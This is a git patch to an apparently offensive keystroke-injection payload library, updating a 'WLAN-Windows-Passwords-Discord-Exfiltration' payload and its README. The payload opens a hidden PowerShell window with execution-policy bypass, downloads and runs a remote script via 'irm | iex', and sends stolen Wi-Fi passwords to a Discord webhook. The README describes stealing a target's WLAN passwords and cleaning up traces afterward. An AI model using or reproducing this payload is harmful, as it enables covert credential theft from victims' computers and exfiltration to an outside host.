From d5185ed11644509432bdf5d5f109a1ddcb15ec3a Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 09:24:02 +0200 Subject: [PATCH] vars --- .../WLAN-Windows-Passwords/README.md | 12 ++----- .../WLAN-Windows-Passwords/payload.txt | 34 +++++++++---------- 2 files changed, 20 insertions(+), 26 deletions(-) diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/README.md b/payloads/library/credentials/WLAN-Windows-Passwords/README.md index a5e8ab2c..6858ab04 100644 --- a/payloads/library/credentials/WLAN-Windows-Passwords/README.md +++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md @@ -1,4 +1,4 @@ -# WLAN Windows Password - BADUSB ✅ +# WLAN Windows Password A script used to stole target WLAN Passwords. @@ -27,7 +27,7 @@ Then it cleans up traces of what you have done after. ## Credits -

Aleff :octocat:

+

Aleff

@@ -37,17 +37,11 @@ Then it cleans up traces of what you have done after.
Github -
- - - -
Instagram -
-
Discord +
LinkedIn
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt index 6d2b201c..5fa787f3 100644 --- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt +++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt @@ -1,24 +1,24 @@ -* ################################################################### -* # # -* # Title : WLAN-Windows-Passwords-Discord-Exfiltration # -* # Author : Aleff # -* # Description: A script used to stole target WLAN Passwords. # -* # Category : Credentials # -* # Target : Windows 10-11 # -* # Version : 1.0 # -* # # -* ################################################################### +################################################################### +# # +# Title : WLAN-Windows-Passwords-Discord-Exfiltration # +# Author : Aleff # +# Description: A script used to stole target WLAN Passwords. # +# Category : Credentials # +# Target : Windows 10-11 # +# Version : 1.0 # +# # +################################################################### ATTACKMODE HID +# VARIABLES +# - Provide Discord Webhook +DISCORD_WEBHOOK='https://discordapp.com/api/webhooks//' +# - Replace example.com with your own link. The Payload should be Windows-Passwords.ps1 +PAYLOAD='example.com' + QUACK DELAY 2000 QUACK GUI r QUACK DELAY 250 -QUACK STRING powershell -w h -ep bypass $discord=' - -# REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// -QUACK STRING DISCORD - -# Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1 -QUACK STRING ';irm PAYLOAD | iex +QUACK STRING powershell -w h -ep bypass \$discord='$DISCORD_WEBHOOK';irm $PAYLOAD | iex QUACK ENTER